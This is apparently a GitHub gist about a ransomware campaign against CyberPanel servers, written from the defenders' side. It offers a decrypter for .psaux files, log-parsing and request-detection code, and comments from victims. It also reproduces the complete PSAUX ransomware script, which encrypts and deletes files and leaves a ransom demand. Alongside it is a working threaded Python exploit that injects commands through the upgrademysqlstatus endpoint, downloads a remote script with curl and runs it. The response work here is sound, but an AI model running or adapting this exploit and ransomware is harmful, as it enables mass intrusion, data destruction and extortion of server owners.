
@gboddin
Last active December 14, 2024 20:07
cyberpanel 0day leaked attack script

CyberPanel ransomware attack/defense

WARNING: Please use good judgement and extra caution before downloading and running something provided in the comment section of this gist.

This repo contains 3 things:

  • A decryption script for .psaux ransoms
  • A link to a decryptor for .encryp ransoms
  • A list of files found on the PSAUX attack server

Ransomware status

We are currently aware of 3 separate groups encrypting CyberPanel instances. The extensions they leave are:

  • .psaux -> Custom ransomware, script based, decryptor available
  • .encryp -> Variant from Babuk's source, decryptor available
  • .locked -> C3RB3R Conti v3-based Ransomware, decryptor status unknown

Decryption

If your server was only targeted by PSAUX and your files carry the .psaux extension, a flaw in PSAUX's implementation (the ransomware ships the RSA private key it uses to wrap the per-host AES key and IV, so that leaked key unwraps them again) means you should be able to use the decrypter 1-decrypt.sh.

If your server was only targeted by the .encryp ransomware, you can use encryp_dec.out provided by v0idxyz.

#!/bin/bash
######################################################################################
# LeakIX PSAUX CyberPanel Ransom campaign decrypter #
# #
# You have been blessed by PSAUX #
# #
# All your files can be decrypted. #
# #
# #
# Telegram: @psauxsec #
# #
# Fun must be made on that channel for weak crypto, #
# #
# Ransomware Rushed by PSAUX #
# #
######################################################################################
# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK
### Fail the script if anything's wrong, that's people's data we're dealing with
set -e
echo "Running PSAUX CyberPanel decrypter..."
### Master key gently provided by PSAUX (the RSA private key embedded in the ransomware)
MASTER_KEY="-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----"
MASTER_KEY_PATH="/tmp/private.pem"
umask 077   # key material and recovered secrets stay readable by this user only
echo "$MASTER_KEY" > "$MASTER_KEY_PATH"
# Decrypt the per-host AES key and IV that the ransomware wrapped with this key pair
openssl pkeyutl -decrypt -inkey "$MASTER_KEY_PATH" -in /var/key.enc -out /tmp/key.enc
openssl pkeyutl -decrypt -inkey "$MASTER_KEY_PATH" -in /var/iv.enc -out /tmp/iv.enc
local_key=$(xxd -p /tmp/key.enc | tr -d '\n')
local_iv=$(xxd -p /tmp/iv.enc | tr -d '\n')
echo "Recovered key: $local_key IV: $local_iv"
# Find all .psaux files and decrypt them; -print0 / read -d '' keeps filenames
# with spaces or odd characters intact. The encrypted copy is removed only after
# openssl reports a successful decryption.
find / -name "*.psaux" -type f -print0 | while IFS= read -r -d '' file; do
    openssl enc -aes-128-cbc -d -K "${local_key}" -iv "${local_iv}" -in "${file}" -out "${file%.psaux}" && rm -- "${file}"
    echo "Restored ${file%.psaux}"
done
# Clean up the unwrapped key material
rm -f /tmp/key.enc /tmp/iv.enc
#!/usr/bin/env bash
private="-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----"
echo "$private" > /var/private.pem
key_name="s2zp8fks9a0L"
echo "Encryption ID: ${key_name}"
PRIVATE_KEY_PATH="/var/private.pem"
if [ ! -f "$PRIVATE_KEY_PATH" ]; then
echo "Private key not found at $PRIVATE_KEY_PATH"
exit 1
fi
PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
if [ -z "$PRIVATE_KEY" ]; then
echo "Could not read the private key (maybe permission issue?)"
exit 1
fi
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."
login_message="
######################################################################################
# Encryptions ID : ${key_name} #
# You have been hacked by PSAUX #
# #
# All your files have been encrypted. #
# #
# To restore access, you can contact us in Telegram #
# #
# Telegram: @psauxsec #
# #
# Payment must be made in cryptocurrency. #
# #
# The price for decryption is 200 dollars. #
# Sample decryption can be served upon request. #
# #
# After payment, you will receive a key to run the decrypter script #
# on your system to restore your files. #
# All your database is downloaded and if you are not going to pay in next 3 days #
# its going to be published in darknet. Best Regards! #
# #
# #
# #
# Ransomware Made by PSAUX #
# #
######################################################################################
"
echo "$login_message" > /etc/motd
key=$(openssl rand -hex 16)
iv=$(openssl rand -hex 16)
echo "Generated key: ${key}"
echo "Generated IV: ${iv}"
echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
if [ $? -eq 0 ]; then
echo "Key encrypted successfully: /var/key.enc"
else
echo "Error with key encryption"
exit 1
fi
echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
if [ $? -eq 0 ]; then
echo "IV encrypted successfully: /var/iv.enc"
else
echo "Error with IV encryption"
exit 1
fi
excluded_dirs=(
"/proc"
"/sys"
"/dev"
"/run"
"/etc"
"/usr"
"/tmp"
"/var/run"
"/var/lock"
"/var/tmp"
"/mnt"
"/sbin"
"/lib64"
"/bin"
"/boot"
"/lib"
"/lib32"
"/srv"
"/libx32"
"/media"
"/lost+found"
)
excluded_files=(
"/var/key.enc"
"/var/iv.enc"
"/var/decrypter.sh"
"/var/index_template.html"
)
is_excluded() {
local path=$1
for excluded in "${excluded_dirs[@]}"; do
if [[ "$path" == "$excluded"* ]]; then
return 0
fi
done
for excluded in "${excluded_files[@]}"; do
if [[ "$path" == "$excluded" ]]; then
return 0
fi
done
return 1
}
encrypt_directory() {
local dir=$1
echo "Encrypting directory: $dir"
find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "Encrypting file: $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
}
encrypt_directory "/"
find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
if ! is_excluded "$dir"; then
cp /var/index_template.html "$dir/index.html"
fi
done
find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "[+] : $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
rm -- "$0" && exit 0
import httpx
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed


def get_CSRF_token(client):
    try:
        resp = client.get("/")
        if resp.status_code == 200:
            return resp.cookies.get('csrftoken')
        else:
            print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
            return None
    except httpx.RequestError:
        print(f"Failed to connect to {client.base_url}")
        return None


def pwn(client, CSRF_token, cmd):
    if not CSRF_token:
        return "No CSRF token"
    headers = {
        "X-CSRFToken": CSRF_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
    try:
        response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
        if response.headers.get("Content-Type", "").startswith("application/json"):
            return response.json().get("requestStatus", "No response")
        else:
            print(f"Unexpected response type from {client.base_url}: {response.text}")
            return "Unexpected response"
    except httpx.RequestError:
        return "Failed to execute"


def execute_command(client, command):
    CSRF_token = get_CSRF_token(client)
    if not CSRF_token:
        print(f"Could not retrieve CSRF token from {client.base_url}")
        return "Failed to retrieve CSRF token"
    print(f"Executing: {command} on {client.base_url}")
    stdout = pwn(client, CSRF_token, command)
    print(stdout)
    return stdout


def process_target(target):
    print(f"Processing target: {target}")
    try:
        client = httpx.Client(base_url=target, verify=False, timeout=5.0)
        # Step 1: Download the file
        if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
            return
        # Step 2: Check if the file exists, retry if necessary
        file_exists = False
        while not file_exists:
            response = execute_command(client, "ls /var/actually.sh")
            if "No such file or directory" not in response:
                file_exists = True
                print("File found. Proceeding with further steps...")
            else:
                print("File not found. Waiting for the download to complete...")
                time.sleep(2)  # Wait for 2 seconds before checking again
        # Step 3: Change permissions for the downloaded file
        execute_command(client, "chmod +x /var/actually.sh")
        # Step 4: Remove any carriage return issues
        execute_command(client, "sed -i 's/\r//g' /var/actually.sh")
        # Step 5: Execute the script with nohup to detach and log to /dev/null
        execute_command(client, "nohup /var/actually.sh")
        print("Script executed and detached.")
    except httpx.RequestError as e:
        print(f"Could not connect to {target}. Error: {str(e)}")


def main(targets_file, max_threads=5):
    try:
        with open(targets_file, "r") as file:
            targets = [line.strip() for line in file if line.strip()]
        with ThreadPoolExecutor(max_threads) as executor:
            future_to_target = {executor.submit(process_target, target): target for target in targets}
            for future in as_completed(future_to_target):
                target = future_to_target[future]
                try:
                    future.result()
                except Exception as exc:
                    print(f"{target} generated an exception: {exc}")
    except FileNotFoundError:
        print(f"Error: File {targets_file} not found.")
        sys.exit(1)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 ak48.py targets.txt [max_threads]")
        sys.exit(1)
    targets_file = sys.argv[1]
    max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5
    main(targets_file, max_threads)
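From the defender's side, the request this script sends is the thing to look for: a PUT to /dataBases/upgrademysqlstatus whose JSON statusfile value carries shell metacharacters instead of a plain path. The following is an added example, not code from the gist, of a small request classifier suitable for a WAF rule or log replay; the function names and the sample bodies are constructed.

```python
import json
import re

# Endpoint abused by the leaked ak48.py script above.
TARGET_PATH = "/dataBases/upgrademysqlstatus"
# Characters that have no place in a status-file path but let a value
# break out into a shell command line (the gist's payload uses ';' and '#').
SHELL_META = re.compile(r"[;&|`$()<>#\n]")


def classify_request(method: str, path: str, body: str) -> dict:
    """Return a verdict for one HTTP request; 'hit' is True when it should alert."""
    verdict = {"method": method, "path": path, "hit": False, "reason": ""}
    if method.upper() != "PUT" or path != TARGET_PATH:
        return verdict
    try:
        params = json.loads(body)
    except json.JSONDecodeError:
        verdict.update(hit=True, reason="non-JSON body on upgrade endpoint")
        return verdict
    statusfile = str(params.get("statusfile", ""))
    if SHELL_META.search(statusfile):
        verdict.update(hit=True, reason=f"shell metacharacters in statusfile: {statusfile!r}")
    elif not statusfile.startswith("/"):
        verdict.update(hit=True, reason="statusfile is not an absolute path")
    return verdict


# Constructed samples: one shaped like the gist's payload, one benign upgrade
# status poll, and an unrelated request.
SAMPLES = [
    ("PUT", TARGET_PATH, '{"statusfile":"/dev/null; id; #","csrftoken":"abc"}'),
    ("PUT", TARGET_PATH, '{"statusfile":"/home/cyberpanel/upgrade.log","csrftoken":"abc"}'),
    ("GET", "/", ""),
]


def scan(samples=SAMPLES) -> list:
    """Classify every sample request and return the verdicts in order."""
    return [classify_request(*s) for s in samples]


if __name__ == "__main__":
    for v in scan():
        print(("ALERT " if v["hit"] else "ok    ") + v["method"], v["path"], v["reason"])
```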
Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
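The auth.log extract above shows the pattern to alert on: repeated password logins as root from a single address. The following added parser, not part of the gist, extracts sshd "Accepted" events and counts root password logins per source IP; the sample is the gist's five lines plus two constructed lines for a key-based login that must not be flagged.

```python
import re
from collections import Counter

# sshd "Accepted" line format as it appears in the gist's auth.log extract.
ACCEPTED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>[\d.]+) port (?P<port>\d+)"
)


def parse_accepted(lines):
    """Yield one dict per successful sshd login; other lines are ignored."""
    for line in lines:
        m = ACCEPTED.match(line)
        if m:
            yield m.groupdict()


def root_password_logins(lines):
    """Return {source_ip: count} for password logins as root, the pattern seen above."""
    hits = Counter()
    for ev in parse_accepted(lines):
        if ev["user"] == "root" and ev["method"] == "password":
            hits[ev["ip"]] += 1
    return dict(hits)


# Sample log: the five lines from the gist, then two constructed lines
# (RFC 5737 address) for a key-based login that should not count.
SAMPLE_LOG = """\
Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
Oct 29 15:00:00 ready sshd[2296500]: Accepted publickey for deploy from 203.0.113.7 port 51000 ssh2
Oct 29 15:00:01 ready sshd[2296500]: Disconnected from user deploy 203.0.113.7 port 51000
""".splitlines()

if __name__ == "__main__":
    for ip, n in root_password_logins(SAMPLE_LOG).items():
        print(f"ALERT root password login x{n} from {ip}")
```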
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai
@Chocapikk

I have found the decrypted file on the server; it's built as a Go executable. I ran the file in a sandbox, and it prints a key before it starts encrypting, but every run gives a new key. Can we reverse engineer the file to know what methods it uses?

Maybe you can share the file here?

@VugarAli

VugarAli commented Dec 3, 2024

Hi @v0idxyz,

Thank you for sharing the decryption tool. I’ve noticed that some users have successfully decrypted .encryp files using it.

However, I’ve followed the provided instructions and encountered an issue. While the file extensions are changed, the content remains encrypted and unreadable.

Could you please provide additional guidance or clarify if there are any prerequisites or common mistakes to avoid? Your help would be greatly appreciated.

Thank you in advance!

@Mizer-Mi

Is there any update for '.L0CK3D'? And are there any people who can solve this by paying money?

@gregbtm

gregbtm commented Dec 14, 2024

Is there any update for '.L0CK3D'? And are there any people who can solve this by paying money?

I'm after the same
